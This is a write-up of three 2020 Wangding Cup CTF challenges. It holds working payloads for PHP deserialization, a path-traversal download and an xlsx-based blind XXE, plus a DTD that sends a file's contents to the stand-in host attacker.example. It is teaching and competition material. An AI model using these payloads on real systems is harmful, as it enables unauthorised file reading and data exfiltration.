
2020 "网鼎杯" (Wangding Cup) Qinglong Group: WriteUp for Some of the Challenges


JieGe


Way too much PY trading (under-the-table flag sharing), and with the Web challenges only handed out in the afternoon there really wasn't enough time; on top of that they even gave every team its own one-to-one Docker container.

From a very humble web dog.

AreUSerialz (100pt)

Key point: deserialization

Opening the container gives you the source code:

<?php

include("flag.php");

highlight_file(__FILE__);

class FileHandler {

    protected $op;
    protected $filename;
    protected $content;

    function __construct() {
        $op = "1";
        $filename = "/tmp/tmpfile";
        $content = "Hello World!";
        $this->process();
    }

    public function process() {
        if($this->op == "1") {
            $this->write();
        } else if($this->op == "2") {
            $res = $this->read();
            $this->output($res);
        } else {
            $this->output("Bad Hacker!");
        }
    }

    private function write() {
        if(isset($this->filename) && isset($this->content)) {
            if(strlen((string)$this->content) > 100) {
                $this->output("Too long!");
                die();
            }
            $res = file_put_contents($this->filename, $this->content);
            if($res) $this->output("Successful!");
            else $this->output("Failed!");
        } else {
            $this->output("Failed!");
        }
    }

    private function read() {
        $res = "";
        if(isset($this->filename)) {
            $res = file_get_contents($this->filename);
        }
        return $res;
    }

    private function output($s) {
        echo "[Result]: <br>";
        echo $s;
    }

    function __destruct() {
        if($this->op === "2")
            $this->op = "1";
        $this->content = "";
        $this->process();
    }

}

function is_valid($s) {
    for($i = 0; $i < strlen($s); $i++)
        if(!(ord($s[$i]) >= 32 && ord($s[$i]) <= 125))
            return false;
    return true;
}

if(isset($_GET{'str'})) {
    $str = (string)$_GET['str'];
    if(is_valid($str)) {
        $obj = unserialize($str);
    }
}

After auditing the code it is obvious that the flag has to be read through the file-read path: op "2" makes process() call read() and then output() the result.

is_valid() has to be bypassed first. Every byte of the string must be in the range 32..125, but the serialized form of a protected property encodes its name as \00*\00name, and those invisible \00 bytes fail the check.

Since PHP 7.1+ unserialize() does not care about the declared visibility of properties, the payload can simply be serialized locally with the properties declared public, which carry no \00 bytes. One more detail: op is sent as the integer 2 rather than the string "2". __destruct() checks $this->op === "2" strictly, which an integer fails, so op is not reset to "1"; process() then checks $this->op == "2" loosely, which the integer passes, so read() runs on $filename.

Payload:

<?php

// Declare the properties public: PHP 7.1+ unserialize() ignores the declared
// visibility, and public property names carry no \0 bytes, so is_valid() passes.
class FileHandler {
    public $op = 2;                           // int 2: fails === "2" in __destruct(), passes == "2" in process()
    public $filename = "/proc/self/cmdline";  // read the command line first to locate the web root
    public $content = "ti0s";
}

// Local copy of the challenge's filter, to check the payload before sending it.
function is_valid($s) {
    for($i = 0; $i < strlen($s); $i++)
        if(!(ord($s[$i]) >= 32 && ord($s[$i]) <= 125))
            return false;
    return true;
}

$a = new FileHandler();
$b = serialize($a);
echo $b."\n";
var_dump(is_valid($b));

Reading /proc/self/cmdline reveals that the web path is /web/html.

Go all in and read the flag directly:

/?str=O:11:"FileHandler":3:{s:2:"op";i:2;s:8:"filename";s:18:"/web/html/flag.php";s:7:"content";s:4:"ti0s";}


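The serialization trick above, as an added example that is not part of the original writeup: a Python script that reproduces PHP's serialize() output for the three properties under each visibility, runs a port of the challenge's is_valid() over both, and emits the final query string. The endpoint path / and the content value "ti0s" are taken from the writeup; everything else is this example's own code.

```python
from urllib.parse import quote

# Added example, not code from the original writeup. It rebuilds the
# FileHandler payload by hand so the effect of property visibility on
# is_valid() is visible byte by byte.


def php_str(s: str) -> str:
    """Serialize a PHP string. The length prefix counts bytes, not characters."""
    return f's:{len(s.encode("utf-8"))}:"{s}";'


def php_value(v) -> str:
    """Serialize the scalar types this payload needs."""
    if isinstance(v, bool):
        return f"b:{int(v)};"
    if isinstance(v, int):
        return f"i:{v};"
    if isinstance(v, str):
        return php_str(v)
    raise TypeError(f"unsupported type {type(v).__name__}")


def php_object(cls: str, props: dict, visibility: str = "public") -> str:
    """Serialize an object the way PHP's serialize() does.

    PHP mangles property names by visibility:
      public    -> name
      protected -> "\\0*\\0name"
      private   -> "\\0Class\\0name"
    The \\0 bytes are exactly what the challenge's is_valid() rejects.
    """
    parts = []
    for name, value in props.items():
        if visibility == "protected":
            name = f"\x00*\x00{name}"
        elif visibility == "private":
            name = f"\x00{cls}\x00{name}"
        elif visibility != "public":
            raise ValueError(f"unknown visibility {visibility!r}")
        parts.append(php_str(name) + php_value(value))
    body = "".join(parts)
    return f'O:{len(cls)}:"{cls}":{len(props)}:{{{body}}}'


def is_valid(s: str) -> bool:
    """Port of the challenge's is_valid(): every byte must be in 32..125."""
    return all(32 <= ord(ch) <= 125 for ch in s)


def build_payload(filename: str, visibility: str = "public") -> str:
    """Serialized FileHandler that makes read() run on `filename`.

    op is the *integer* 2: __destruct() compares with === "2", which an int
    fails (so op is not reset to "1"), while process() compares with == "2",
    which the int passes, so read() is called.
    """
    props = {"op": 2, "filename": filename, "content": "ti0s"}
    return php_object("FileHandler", props, visibility)


def build_url(filename: str) -> str:
    """Query string for the challenge page (served at /, as in the writeup)."""
    return "/?str=" + quote(build_payload(filename), safe="")


if __name__ == "__main__":
    for vis in ("protected", "public"):
        p = build_payload("/web/html/flag.php", vis)
        print(f"{vis:<9} is_valid={is_valid(p)!s:<5} {p!r}")
    print(build_url("/proc/self/cmdline"))
    print(build_url("/web/html/flag.php"))
```

Running it prints the protected variant with its \x00 bytes (rejected by is_valid) next to the public one (accepted), and the public one is byte-for-byte the string used in the writeup's final request.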
filejava (46pt)

Key points: directory traversal, arbitrary file download, Java decompilation, blind XXE

The download page has a path traversal, which lets us read web.xml:

http://url/file_in_java/DownloadServlet?filename=../../../../WEB-INF/web.xml

[Screenshots in this section are from the original post on Ti0s's Blog]

Download the class files.


Don't ask me why I didn't just download the /flag file:

DownloadServlet.class filters on "flag" here, so it can't be downloaded directly.


So it should be a matter of using an xlsx and crafting the XML file inside it to read the flag;

this is the same as doing XXE through the XML inside a docx.


Then upload it and check the log.

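The xlsx-based blind XXE described above, as an added example that is not the writeup's own code (the writeup only shows screenshots): a Python script that builds a bare-bones xlsx package whose xl/workbook.xml carries a DOCTYPE pulling an external DTD, plus the DTD to host on the attacker's server so that the target file's content shows up in that server's HTTP log. The attacker host attacker.example, the DTD name evil.dtd, the target /flag, and the choice of xl/workbook.xml as the part the server parses are all assumptions; which part the upload handler actually feeds to an XML parser depends on the library it uses.

```python
import io
import zipfile

# Added example, not the writeup's own code. Assumptions: the attacker host,
# the DTD file name, the target file, and that the server parses
# xl/workbook.xml with external entities enabled.
ATTACKER = "http://attacker.example"   # assumption: host whose HTTP log you can read
DTD_URL = ATTACKER + "/evil.dtd"       # assumption: where oob_dtd() is served
TARGET_FILE = "/flag"                  # assumption: file DownloadServlet refuses to serve

_CONTENT_TYPES = (
    '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>\n'
    '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">\n'
    '  <Default Extension="rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>\n'
    '  <Default Extension="xml" ContentType="application/xml"/>\n'
    '  <Override PartName="/xl/workbook.xml" ContentType="application/vnd.openxmlformats-officedocument.spreadsheetml.sheet.main+xml"/>\n'
    '  <Override PartName="/xl/worksheets/sheet1.xml" ContentType="application/vnd.openxmlformats-officedocument.spreadsheetml.worksheet+xml"/>\n'
    "</Types>\n"
)
_ROOT_RELS = (
    '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>\n'
    '<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">\n'
    '  <Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/officeDocument" Target="xl/workbook.xml"/>\n'
    "</Relationships>\n"
)
_WORKBOOK_RELS = (
    '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>\n'
    '<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">\n'
    '  <Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/worksheet" Target="worksheets/sheet1.xml"/>\n'
    "</Relationships>\n"
)
_SHEET = (
    '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>\n'
    '<worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main"><sheetData/></worksheet>\n'
)


def oob_dtd(target_file: str = TARGET_FILE, attacker: str = ATTACKER) -> str:
    """External DTD to host at DTD_URL.

    Parameter entities nest: %file; is the target's content, %eval; declares a
    general entity whose SYSTEM URL embeds it, and %exfil; makes the victim's
    parser fetch that URL, so the content lands in the attacker's access log.
    """
    return (
        f'<!ENTITY % file SYSTEM "file://{target_file}">\n'
        f'<!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM \'{attacker}/?d=%file;\'>">\n'
        "%eval;\n"
        "%exfil;\n"
    )


def workbook_xml(dtd_url: str = DTD_URL) -> str:
    """xl/workbook.xml with a DOCTYPE that loads and expands the remote DTD."""
    return (
        '<?xml version="1.0" encoding="UTF-8"?>\n'
        "<!DOCTYPE workbook [\n"
        f'  <!ENTITY % remote SYSTEM "{dtd_url}">\n'
        "  %remote;\n"
        "]>\n"
        '<workbook xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main"\n'
        '          xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">\n'
        '  <sheets><sheet name="Sheet1" sheetId="1" r:id="rId1"/></sheets>\n'
        "</workbook>\n"
    )


def build_xlsx(dtd_url: str = DTD_URL) -> bytes:
    """Bare-bones spreadsheet package with the XXE DOCTYPE in workbook.xml."""
    parts = {
        "[Content_Types].xml": _CONTENT_TYPES,
        "_rels/.rels": _ROOT_RELS,
        "xl/workbook.xml": workbook_xml(dtd_url),
        "xl/_rels/workbook.xml.rels": _WORKBOOK_RELS,
        "xl/worksheets/sheet1.xml": _SHEET,
    }
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        for name, data in parts.items():
            z.writestr(name, data)
    return buf.getvalue()


def part_names(xlsx: bytes) -> list:
    with zipfile.ZipFile(io.BytesIO(xlsx)) as z:
        return z.namelist()


def read_part(xlsx: bytes, name: str) -> str:
    with zipfile.ZipFile(io.BytesIO(xlsx)) as z:
        return z.read(name).decode("utf-8")


if __name__ == "__main__":
    with open("evil.dtd", "w") as f:
        f.write(oob_dtd())
    with open("xxe.xlsx", "wb") as f:
        f.write(build_xlsx())
    # Serve evil.dtd at DTD_URL, upload xxe.xlsx, then grep the attacker's
    # HTTP log for "GET /?d=".
```

Because the exfiltrated content is embedded in a URL, this only works cleanly for short single-line files such as a flag; newlines or URL-illegal characters in the target make the parser or the request fail, and a Java parser offers no php://filter-style wrapper to base64 the content first. If nothing arrives in the log, the other XML parts of the package ([Content_Types].xml, the sheet XML) are the next places to put the DOCTYPE, since which part gets parsed is specific to the server's library.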

boom (7pt)


Look the hash up on cmd5.


This gives x=74, y=68, z=31.


Script to solve the quadratic equation:

import math

print("ax*x+bx+c=0")
a = float(input("enter a: "))
b = float(input("enter b: "))
c = float(input("enter c: "))
p = b*b - 4*a*c   # discriminant
if p < 0:
    print("no real solution")
    exit()
else:
    x1 = (-b + math.sqrt(p)) / (2*a)
    x2 = (-b - math.sqrt(p)) / (2*a)
    print("first solution: " + str(x1), "second solution: " + str(x2))
